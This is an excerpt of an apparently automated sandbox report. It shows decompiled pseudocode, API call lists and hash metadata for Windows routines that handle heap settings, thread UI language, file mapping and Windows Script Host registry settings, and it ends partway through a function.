                                                        • Instruction Fuzzy Hash: 31215E75D04208BBDB11AF959D82EAEBBFCEB04F54F1440AAB515B31A1CA714E41DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00B837F5() {
                                                        				signed int _t4;
                                                        				_Unknown_base(*)()* _t5;
                                                        				signed int _t8;
                                                        				signed int _t9;
                                                        				struct HINSTANCE__* _t11;
                                                        				void* _t13;
                                                        
                                                        				_t9 = _t8 ^ _t8;
                                                        				_t13 =  *0xb97000 - _t9; // 0x0
                                                        				if(_t13 == 0) {
                                                        					return 1;
                                                        				} else {
                                                        					_t11 = LoadLibraryA("kernel32.dll");
                                                        					if(_t11 == _t9) {
                                                        						_t4 = 0;
                                                        					} else {
                                                        						_t5 = GetProcAddress(_t11, "HeapSetInformation");
                                                        						if(_t5 != _t9) {
                                                        							_t9 =  *_t5(_t9, 1, _t9, _t9);
                                                        						}
                                                        						FreeLibrary(_t11);
                                                        						_t4 = _t9;
                                                        					}
                                                        					return _t4;
                                                        				}
                                                        			}










                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B8380C
                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B83822
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B83836
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: HeapSetInformation$kernel32.dll
                                                        • API String ID: 145871493-3597996958
                                                        • Opcode ID: 10cc0e52260035658fb3e9665cd08ee8a1e750ec9ba9f99d4efad9478f660987
                                                        • Instruction ID: 43d9cf00c8a0902e4da747cf79f1bc2db33e9d46c989ca5afde6d83828114c55
                                                        • Opcode Fuzzy Hash: 10cc0e52260035658fb3e9665cd08ee8a1e750ec9ba9f99d4efad9478f660987
                                                        • Instruction Fuzzy Hash: 6DE0927234A2D03FD7207BB41CC89665ACDE745B9632408B5F106D3170EA508D41D360
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00B82F29(signed int _a4) {
                                                        				_Unknown_base(*)()* _t6;
                                                        				struct HINSTANCE__* _t10;
                                                        
                                                        				_t10 = LoadLibraryW(L"kernel32.dll");
                                                        				if(_t10 != 0) {
                                                        					_t6 = GetProcAddress(_t10, "SetThreadUILanguage");
                                                        					if(_t6 != 0) {
                                                        						_a4 =  *_t6(_a4) & 0x0000ffff;
                                                        					}
                                                        					FreeLibrary(_t10);
                                                        				}
                                                        				return _a4;
                                                        			}






                                                        APIs
                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00B82EDF,00000000), ref: 00B82F34
                                                        • GetProcAddress.KERNEL32(00000000,SetThreadUILanguage,?,00B82EDF,00000000), ref: 00B82F46
                                                        • FreeLibrary.KERNEL32(00000000,?,00B82EDF,00000000), ref: 00B82F5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: SetThreadUILanguage$kernel32.dll
                                                        • API String ID: 145871493-927383962
                                                        • Opcode ID: 1cf8d99c3779383a567e2850cb72ede6a83205c9c33ade3253eac3e9628edee6
                                                        • Instruction ID: 05d9ca260f01367e0467ba0b302d0f792abdd60317f47d97554b84c3e55902a5
                                                        • Opcode Fuzzy Hash: 1cf8d99c3779383a567e2850cb72ede6a83205c9c33ade3253eac3e9628edee6
                                                        • Instruction Fuzzy Hash: 67E04F355422696B87112F55DC08AAA7EACEE557D27108061FE08D3174DB30C942C7E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 26%
                                                        			E00B8477C(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				char _v20;
                                                        				intOrPtr _v28;
                                                        				char _v36;
                                                        				signed int _t34;
                                                        				char* _t36;
                                                        				intOrPtr* _t42;
                                                        				signed int* _t44;
                                                        				signed int _t47;
                                                        				void* _t49;
                                                        				short _t50;
                                                        				void* _t54;
                                                        				signed int* _t55;
                                                        				intOrPtr* _t56;
                                                        
                                                        				_push(0x28);
                                                        				L00B82877();
                                                        				_t47 = 0;
                                                        				if(__eax == 0) {
                                                        					_t56 = 0;
                                                        				} else {
                                                        					_t56 = E00B84873(__eax);
                                                        				}
                                                        				if(_t56 == _t47) {
                                                        					_t55 = 0x8007000e;
                                                        					goto L17;
                                                        				} else {
                                                        					_t34 = 0;
                                                        					_v8 = _t47;
                                                        					if(_a4 <= _t47) {
                                                        						L7:
                                                        						_v20 = _v8;
                                                        						_t36 =  &_v20;
                                                        						_v16 = _t47;
                                                        						__imp__#15(0xc, 1, _t36);
                                                        						 *((intOrPtr*)(_t56 + 0x24)) = _t36;
                                                        						if(_t36 == _t47) {
                                                        							L19:
                                                        							_t55 = 0x8007000e;
                                                        							L16:
                                                        							if(_t56 != 0) {
                                                        								 *((intOrPtr*)( *_t56 + 8))(_t56);
                                                        							}
                                                        							L17:
                                                        							return _t55;
                                                        						}
                                                        						_v12 = _t47;
                                                        						if(_a4 <= _t47) {
                                                        							L15:
                                                        							 *_a12 = _t56;
                                                        							_t56 = 0;
                                                        							_t55 = 0;
                                                        							goto L16;
                                                        						}
                                                        						while(_v12 < _v8) {
                                                        							_t42 =  *((intOrPtr*)(_a8 + _t47 * 4));
                                                        							_t49 = 0x2f;
                                                        							if(_t49 ==  *_t42) {
                                                        								L14:
                                                        								_t47 = _t47 + 1;
                                                        								if(_t47 < _a4) {
                                                        									continue;
                                                        								}
                                                        								goto L15;
                                                        							}
                                                        							_t50 = 8;
                                                        							_v36 = _t50;
                                                        							__imp__#2(_t42);
                                                        							_v28 = _t42;
                                                        							if(_t42 == 0) {
                                                        								goto L19;
                                                        							}
                                                        							_t44 =  &_v12;
                                                        							__imp__#26( *((intOrPtr*)(_t56 + 0x24)), _t44,  &_v36);
                                                        							_t55 = _t44;
                                                        							__imp__#9( &_v36);
                                                        							if(_t55 < 0) {
                                                        								goto L16;
                                                        							}
                                                        							_v12 = _v12 + 1;
                                                        							goto L14;
                                                        						}
                                                        						goto L15;
                                                        					} else {
                                                        						goto L4;
                                                        					}
                                                        					do {
                                                        						L4:
                                                        						_t54 = 0x2f;
                                                        						if(_t54 !=  *((intOrPtr*)( *((intOrPtr*)(_a8 + _t34 * 4))))) {
                                                        							_v8 = _v8 + 1;
                                                        						}
                                                        						_t34 = _t34 + 1;
                                                        					} while (_t34 < _a4);
                                                        					goto L7;
                                                        				}
                                                        			}

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84789
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B847DC
                                                        • SysAllocString.OLEAUT32(FF85F88B), ref: 00B8480F
                                                        • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84827
                                                        • VariantClear.OLEAUT32(?), ref: 00B84833
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$??2@AllocClearCreateElementStringVariant
                                                        • String ID:
                                                        • API String ID: 1438706513-0
                                                        • Opcode ID: 0c9dba47491affb6e2a3ab3d29dde74ec96dc54f007b27a13b1095dd2089c703
                                                        • Instruction ID: 7b056e826fa404230ddb1ab7a816228a697bee53f5ccfd6e4287bdf9d15ccddf
                                                        • Opcode Fuzzy Hash: 0c9dba47491affb6e2a3ab3d29dde74ec96dc54f007b27a13b1095dd2089c703
                                                        • Instruction Fuzzy Hash: 6D31437690025AEFCB10EFA5C8C4AAEB7F4FB44710F2445AAE901EB260D734DD81CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 40%
                                                        			E00B84689(void* __eax, void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				char _v16;
                                                        				signed int _v24;
                                                        				char _v32;
                                                        				void* __esi;
                                                        				char* _t31;
                                                        				short _t39;
                                                        				signed int _t40;
                                                        				signed int* _t42;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				signed int* _t51;
                                                        				intOrPtr _t52;
                                                        				intOrPtr* _t53;
                                                        
                                                        				_t46 = __ebx;
                                                        				_push(0x4c);
                                                        				L00B82877();
                                                        				if(__eax == 0) {
                                                        					_t53 = 0;
                                                        				} else {
                                                        					_t53 = E00B83A08(__eax);
                                                        				}
                                                        				if(_t53 == 0) {
                                                        					_t51 = 0x8007000e;
                                                        					goto L13;
                                                        				} else {
                                                        					_t52 = _a4;
                                                        					_v12 = _v12 & 0x00000000;
                                                        					_t31 =  &_v16;
                                                        					_v16 = _t52;
                                                        					__imp__#15(0xc, 1, _t31);
                                                        					 *((intOrPtr*)(_t53 + 0x28)) = _t31;
                                                        					if(_t31 == 0) {
                                                        						_t51 = 0x8007000e;
                                                        						L12:
                                                        						if(_t53 != 0) {
                                                        							 *((intOrPtr*)( *_t53 + 8))(_t53);
                                                        						}
                                                        						L13:
                                                        						return _t51;
                                                        					}
                                                        					_v8 = _v8 & 0x00000000;
                                                        					_push(_t46);
                                                        					_t47 = _a8;
                                                        					if(_t52 <= 0) {
                                                        						L8:
                                                        						_t23 = _t53 + 0x2c; // 0x2c
                                                        						_t51 = E00B84931(_t23, _t53, _a4, _t47, _t23);
                                                        						if(_t51 >= 0) {
                                                        							_t25 = _t53 + 0x30; // 0x30
                                                        							_t51 = E00B8477C(_t25, _a4, _t47, _t25);
                                                        							if(_t51 >= 0) {
                                                        								 *_a12 = _t53;
                                                        								_t53 = 0;
                                                        								_t51 = 0;
                                                        							}
                                                        						}
                                                        						L11:
                                                        						goto L12;
                                                        					} else {
                                                        						goto L5;
                                                        					}
                                                        					while(1) {
                                                        						L5:
                                                        						_t39 = 8;
                                                        						_v32 = _t39;
                                                        						_t40 = _v8;
                                                        						__imp__#2( *((intOrPtr*)(_t47 + _t40 * 4)));
                                                        						_v24 = _t40;
                                                        						if(_t40 == 0) {
                                                        							break;
                                                        						}
                                                        						_t42 =  &_v8;
                                                        						__imp__#26( *((intOrPtr*)(_t53 + 0x28)), _t42,  &_v32);
                                                        						_t51 = _t42;
                                                        						__imp__#9( &_v32);
                                                        						if(_t51 < 0) {
                                                        							goto L11;
                                                        						}
                                                        						_v8 = _v8 + 1;
                                                        						if(_v8 < _a4) {
                                                        							continue;
                                                        						}
                                                        						goto L8;
                                                        					}
                                                        					_t51 = 0x8007000e;
                                                        					goto L11;
                                                        				}
                                                        			}

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84695
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B846C6
                                                        • SysAllocString.OLEAUT32(?), ref: 00B846F0
                                                        • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84708
                                                        • VariantClear.OLEAUT32(?), ref: 00B84714
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$??2@AllocClearCreateElementStringVariant
                                                        • String ID:
                                                        • API String ID: 1438706513-0
                                                        • Opcode ID: 55f32a343458b7407fe8bb578e604ca9f9f7ca630c374490cd34aaa8e6bcf4e8
                                                        • Instruction ID: 04d7041db8dde127cf6e9ef68fca060d4887ed0409380d7f63575326cfaf9f7e
                                                        • Opcode Fuzzy Hash: 55f32a343458b7407fe8bb578e604ca9f9f7ca630c374490cd34aaa8e6bcf4e8
                                                        • Instruction Fuzzy Hash: 2131957A90060AEBDB11EF94C844B6E77F9EF85750F264495E825DB220DB34DD41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E00B86F4A(void* __fp0, intOrPtr _a4, signed char _a8) {
                                                        				signed char _v8;
                                                        				long long _v12;
                                                        				void* _v20;
                                                        				struct tagMSG _v48;
                                                        				signed char _t17;
                                                        				long _t19;
                                                        				long long _t43;
                                                        
                                                        				_t40 = __fp0;
                                                        				if(_a8 < 0) {
                                                        					return 0x80070057;
                                                        				}
                                                        				_t17 = GetTickCount();
                                                        				_v8 = _t17;
                                                        				asm("fild dword [ebp-0x4]");
                                                        				if(_t17 < 0) {
                                                        					_t40 = __fp0 +  *0xb88f48;
                                                        				}
                                                        				asm("fst qword [ebp-0x10]");
                                                        				asm("fild dword [ebp+0xc]");
                                                        				_v12 = _t40 + st1;
                                                        				_t43 = _v12;
                                                        				asm("fcomp st0, st2");
                                                        				asm("fnstsw ax");
                                                        				st1 = _t43;
                                                        				while((_t17 & 0x00000041) == 0) {
                                                        					asm("fsubr qword [ebp-0x8]");
                                                        					_t19 = E00B87011();
                                                        					if(_t19 > 0x3e8) {
                                                        						_t19 = 0x3e8;
                                                        					}
                                                        					MsgWaitForMultipleObjects(0, 0, 1, _t19, 0x1ff);
                                                        					if(PeekMessageA( &_v48, 0, 0, 0, 1) != 0) {
                                                        						DispatchMessageA( &_v48);
                                                        					}
                                                        					if(E00B81D76( *((intOrPtr*)(_a4 + 0x40))) != 0) {
                                                        						L11:
                                                        						return 0;
                                                        					} else {
                                                        						_t17 = GetTickCount();
                                                        						_a8 = _t17;
                                                        						asm("fild dword [ebp+0xc]");
                                                        						if(_t17 < 0) {
                                                        						}
                                                        						asm("fcomp st0, st1");
                                                        						asm("fnstsw ax");
                                                        						if((_t17 & 0x00000041) == 0) {
                                                        						}
                                                        						_t43 = _v12;
                                                        						asm("fcomp st0, st1");
                                                        						asm("fnstsw ax");
                                                        						continue;
                                                        					}
                                                        				}
                                                        				st0 = _t43;
                                                        				goto L11;
                                                        			}











                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00B86F65
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B86FAD
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B86FBC
                                                        • GetTickCount.KERNEL32 ref: 00B86FD9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CountTick$MessageMultipleObjectsPeekWait
                                                        • String ID:
                                                        • API String ID: 856712567-0
                                                        • Opcode ID: 8e4d2a9ab0137d39abbbbfc67c24fcaec84c1d4b803f9b930b35bc09d01f418b
                                                        • Instruction ID: 2f07663fa340f8271c2fa0562038229d2f5ebc35db5898e9875700ecfac8b670
                                                        • Opcode Fuzzy Hash: 8e4d2a9ab0137d39abbbbfc67c24fcaec84c1d4b803f9b930b35bc09d01f418b
                                                        • Instruction Fuzzy Hash: 38219A70A0411AA7DB157FA1E988ADE7BBDFF05350F608894E609E61B4EF30C941CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B85539(intOrPtr __ecx, void* __edx, short* _a4, long _a8, long _a12, long _a16, long _a20, intOrPtr _a24) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t21;
                                                        				signed int _t26;
                                                        				void* _t29;
                                                        				void* _t35;
                                                        				int _t36;
                                                        				void* _t37;
                                                        				signed int _t38;
                                                        				char* _t39;
                                                        				intOrPtr _t41;
                                                        
                                                        				_t35 = __edx;
                                                        				_t21 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t21 ^ _t38;
                                                        				_v16 = __ecx;
                                                        				_push(0);
                                                        				_t41 =  *0xb97001; // 0x0
                                                        				if(_t41 == 0) {
                                                        					_t37 = WideCharToMultiByte;
                                                        					_t36 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, ??);
                                                        					if(_t36 != 0) {
                                                        						E00B8320B(_t23);
                                                        						_v12 = _t39;
                                                        						if(_t39 != 0) {
                                                        							if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t36, 0, 0) == 0) {
                                                        								goto L6;
                                                        							}
                                                        							_t29 = CreateFileA(_v12, _a8, _a12, 0, _a16, _a20, 0);
                                                        							L2:
                                                        							if(_t29 == 0xffffffff) {
                                                        								goto L6;
                                                        							}
                                                        							_t26 = E00B856C1(_v16, _t29, _a24);
                                                        							L4:
                                                        							return E00B81335(_t26, 0, _v8 ^ _t38, _t35, _t36, _t37);
                                                        						}
                                                        						_t26 = 0x8007000e;
                                                        						goto L4;
                                                        					}
                                                        					L6:
                                                        					_t26 = GetLastError();
                                                        					if(_t26 > 0) {
                                                        						_t26 = _t26 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					goto L4;
                                                        				}
                                                        				_t29 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, ??);
                                                        				goto L2;
                                                        			}




















                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000), ref: 00B85570
                                                          • Part of subcall function 00B856C1: GetFileSize.KERNEL32(?,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B856DC
                                                          • Part of subcall function 00B856C1: CreateFileMappingA.KERNEL32 ref: 00B85701
                                                          • Part of subcall function 00B856C1: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B85721
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,00000002,00000000,?,?), ref: 00B899D9
                                                        • GetLastError.KERNEL32(?,?,00000002,00000000,?,?), ref: 00B899E1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide
                                                        • String ID:
                                                        • API String ID: 506574795-0
                                                        • Opcode ID: 011561b489da81d9bbab58c308c0f6c2408430139b2e79fc162367a513ea6475
                                                        • Instruction ID: 85b7661c8e338e1f7ef388188046a76ebca8e077f146a75cbfb2911b749f0ede
                                                        • Opcode Fuzzy Hash: 011561b489da81d9bbab58c308c0f6c2408430139b2e79fc162367a513ea6475
                                                        • Instruction Fuzzy Hash: 15216DB290410DBFDF11AFA48C85DFE7FAEEB05364B104569F621A6070DA358D61DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 78%
                                                        			E00B83415(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, void** _a16) {
                                                        				signed int _v8;
                                                        				int _v12;
                                                        				void* _v24;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t17;
                                                        				short* _t19;
                                                        				long _t20;
                                                        				void* _t28;
                                                        				void* _t32;
                                                        				void* _t34;
                                                        				int _t35;
                                                        				void* _t37;
                                                        				signed int _t39;
                                                        				int _t40;
                                                        				intOrPtr _t42;
                                                        
                                                        				_t32 = __edx;
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				_t17 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t17 ^ _t39;
                                                        				_t42 =  *0xb97001; // 0x0
                                                        				if(_t42 == 0) {
                                                        					_t19 = _a8;
                                                        					__eflags = _t19;
                                                        					if(__eflags == 0) {
                                                        						L13:
                                                        						_v12 = 0;
                                                        						L14:
                                                        						_t20 = RegOpenKeyExA(_a4, _v12, 0, _a12, _a16);
                                                        						L2:
                                                        						if(_t20 != 0) {
                                                        							L5:
                                                        							if(__eflags > 0) {
                                                        								_t20 = _t20 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							L4:
                                                        							_pop(_t34);
                                                        							_pop(_t37);
                                                        							_pop(_t28);
                                                        							return E00B81335(_t20, _t28, _v8 ^ _t39, _t32, _t34, _t37);
                                                        						}
                                                        						_t20 = 0;
                                                        						goto L4;
                                                        					}
                                                        					__eflags =  *_t19;
                                                        					if(__eflags == 0) {
                                                        						goto L13;
                                                        					}
                                                        					_t35 = WideCharToMultiByte(0, 0, _t19, 0xffffffff, 0, 0, 0, 0);
                                                        					__eflags = _t35;
                                                        					if(_t35 != 0) {
                                                        						E00B8320B(_t23);
                                                        						_v12 = _t40;
                                                        						__eflags = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t35, 0, 0);
                                                        						if(__eflags == 0) {
                                                        							goto L10;
                                                        						}
                                                        						goto L14;
                                                        					}
                                                        					L10:
                                                        					_t20 = GetLastError();
                                                        					__eflags = _t20;
                                                        					goto L5;
                                                        				}
                                                        				_t20 = RegOpenKeyExW(_a4, _a8, 0, _a12, _a16);
                                                        				goto L2;
                                                        			}





















                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00020019,80000000,?,?,?,?,00B841E5,80000000), ref: 00B8962E
                                                        • GetLastError.KERNEL32(?,00B841E5,80000000,74BA46CE,00020019,?,74BA46CE), ref: 00B89636
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiOpenWide
                                                        • String ID:
                                                        • API String ID: 881805846-0
                                                        • Opcode ID: 45064a5b46322b7e04a43f29a711f845cdfccd46aa51113f99f6965822adc5dd
                                                        • Instruction ID: 06e4821be67bfbfb0a43444d25d727b97ab573cceba160f2ca25585ef7546ff0
                                                        • Opcode Fuzzy Hash: 45064a5b46322b7e04a43f29a711f845cdfccd46aa51113f99f6965822adc5dd
                                                        • Instruction Fuzzy Hash: E8218BB250410DBF9F11AF94CC84CBE7BEDEB057A4B2445A5F61196170DA318E50DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E00B83B78(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, void** _a16) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				void* _v24;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t16;
                                                        				long _t21;
                                                        				void* _t26;
                                                        				void* _t30;
                                                        				int _t32;
                                                        				void* _t33;
                                                        				void* _t36;
                                                        				signed int _t37;
                                                        				char* _t38;
                                                        				intOrPtr _t40;
                                                        
                                                        				_t30 = __edx;
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				_t16 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t16 ^ _t37;
                                                        				_push(0);
                                                        				_t40 =  *0xb97001; // 0x0
                                                        				if(_t40 == 0) {
                                                        					_t32 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, ??);
                                                        					__eflags = _t32;
                                                        					if(_t32 != 0) {
                                                        						E00B8320B(_t18);
                                                        						_v12 = _t38;
                                                        						__eflags = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t32, 0, 0);
                                                        						if(__eflags == 0) {
                                                        							goto L8;
                                                        						}
                                                        						_t21 = RegCreateKeyExA(_a4, _v12, 0, 0, 0, _a12, 0, _a16, 0);
                                                        						L2:
                                                        						if(_t21 != 0) {
                                                        							L5:
                                                        							if(__eflags > 0) {
                                                        								_t21 = _t21 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							L4:
                                                        							_pop(_t33);
                                                        							_pop(_t36);
                                                        							_pop(_t26);
                                                        							return E00B81335(_t21, _t26, _v8 ^ _t37, _t30, _t33, _t36);
                                                        						}
                                                        						_t21 = 0;
                                                        						goto L4;
                                                        					}
                                                        					L8:
                                                        					_t21 = GetLastError();
                                                        					__eflags = _t21;
                                                        					goto L5;
                                                        				}
                                                        				_t21 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, _a12, 0, _a16, ??);
                                                        				goto L2;
                                                        			}




















                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,00B82238,?,00000000,?,?,?,00B83D5D,00B82218), ref: 00B896A0
                                                        • GetLastError.KERNEL32(?,00B83D5D,00B82218,Software\Microsoft\Windows Script Host\Settings,00020019,00B82218,00B8220C,?,?,00B82388,80000002,00000000,?,00B82238,00B82218,00B8221C), ref: 00B896A8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00B82218,00000000,00000000,00000000,?,00B83D5D,00B82218,Software\Microsoft\Windows Script Host\Settings,00020019,00B82218,00B8220C,?), ref: 00B896C7
                                                        • RegCreateKeyExA.ADVAPI32(00B82218,00B82218,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B896DE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharCreateMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3494534822-0
                                                        • Opcode ID: e89895606ea103734d818ce62f1eedf19b3430083d572bda6ad61320367975a2
                                                        • Instruction ID: 54dcb041904e49293a3aef01f668909084aa1d8688f132fee95f3205f39443de
                                                        • Opcode Fuzzy Hash: e89895606ea103734d818ce62f1eedf19b3430083d572bda6ad61320367975a2
                                                        • Instruction Fuzzy Hash: 56216AB250010DBFAF01AFA4DDC4DBF3BADEB453A8B1445A5F61292070DA358D55DB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 70%
                                                        			E00B93671(void* __ecx, void* __edx, void* _a4, short* _a8, char _a12) {
                                                        				signed int _v8;
                                                        				int _v12;
                                                        				void* _v24;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t16;
                                                        				signed int _t19;
                                                        				void* _t28;
                                                        				void* _t32;
                                                        				void* _t34;
                                                        				int _t35;
                                                        				void* _t37;
                                                        				signed int _t39;
                                                        				int _t40;
                                                        				intOrPtr _t42;
                                                        
                                                        				_t32 = __edx;
                                                        				_push(__ecx);
                                                        				_push(__ecx);
                                                        				_t16 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t16 ^ _t39;
                                                        				_t42 =  *0xb97001; // 0x0
                                                        				if(_t42 == 0) {
                                                        					if(_a8 == 0) {
                                                        						_v12 = 0;
                                                        						goto L8;
                                                        					} else {
                                                        						_t35 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                        						if(_t35 != 0) {
                                                        							E00B8320B(_t22);
                                                        							_v12 = _t40;
                                                        							if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t35, 0, 0) == 0) {
                                                        								goto L4;
                                                        							} else {
                                                        								L8:
                                                        								_t19 = RegSetValueExA(_a4, _v12, 0, 4,  &_a12, 4);
                                                        							}
                                                        						} else {
                                                        							L4:
                                                        							_t19 = GetLastError();
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_t19 = RegSetValueExW(_a4, _a8, 0, 4,  &_a12, 4);
                                                        				}
                                                        				if(_t19 > 0) {
                                                        					_t19 = _t19 & 0x0000ffff | 0x80070000;
                                                        				}
                                                        				_pop(_t34);
                                                        				_pop(_t37);
                                                        				_pop(_t28);
                                                        				return E00B81335(_t19, _t28, _v8 ^ _t39, _t32, _t34, _t37);
                                                        			}

                                                        APIs
                                                        • RegSetValueExW.ADVAPI32 ref: 00B9369E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,80000001,?,00000000,?,?,?,00B8F0A3,00B82218), ref: 00B936BC
                                                        • GetLastError.KERNEL32(?,?,?,00B8F0A3,00B82218,Timeout,00000000,80000001,00B82218,Software\Microsoft\Windows Script Host\Settings,00020006,00B82218,00B8220C,?,00B88068,80000001), ref: 00B936C4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiValueWide
                                                        • String ID:
                                                        • API String ID: 2367157299-0
                                                        • Opcode ID: 4c9fbd856190a91f61edb40300194fa43ea1559cf9b79dc0d5219a9a3ffd978f
                                                        • Instruction ID: b31235fa17402b27bf4f63d0dfb8cba8709bfa2cd6cd3443182280e33c4ae06c
                                                        • Opcode Fuzzy Hash: 4c9fbd856190a91f61edb40300194fa43ea1559cf9b79dc0d5219a9a3ffd978f
                                                        • Instruction Fuzzy Hash: E72147B250410DBEEF10AF948C81EBE7FEDEB067A4F248569F611961A0CA358E15DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B856C1(void** __ecx, void* _a4, long _a8) {
                                                        				void* _t8;
                                                        				long _t10;
                                                        				signed int _t11;
                                                        				void* _t13;
                                                        				void* _t15;
                                                        				long _t17;
                                                        				long _t20;
                                                        				void** _t25;
                                                        
                                                        				_t8 = _a4;
                                                        				_t25 = __ecx;
                                                        				if(_t8 == 0xffffffff) {
                                                        					return 0x8000ffff;
                                                        				}
